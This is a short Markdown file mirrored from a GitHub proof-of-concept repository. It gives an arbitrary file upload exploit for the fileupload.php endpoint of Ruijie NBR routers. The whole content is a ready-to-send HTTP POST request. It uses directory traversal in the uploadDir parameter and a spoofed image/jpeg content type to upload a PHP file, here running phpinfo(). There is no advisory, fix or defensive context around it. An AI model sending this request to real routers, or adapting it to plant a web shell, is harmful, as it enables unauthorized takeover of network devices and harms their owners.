mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-08-04 08:43:34 +00:00
12 lines
295 B
Markdown
12 lines
295 B
Markdown
![]() |
## 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞
|
||
|
|
||
|
```
|
||
|
POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
|
||
|
Host:
|
||
|
Accept: text/plain, */*; q=0.01
|
||
|
Content-Disposition: form-data; name="file"; filename="111.php"
|
||
|
Content-Type: image/jpeg
|
||
|
|
||
|
<?php phpinfo();?>
|
||
|
```
|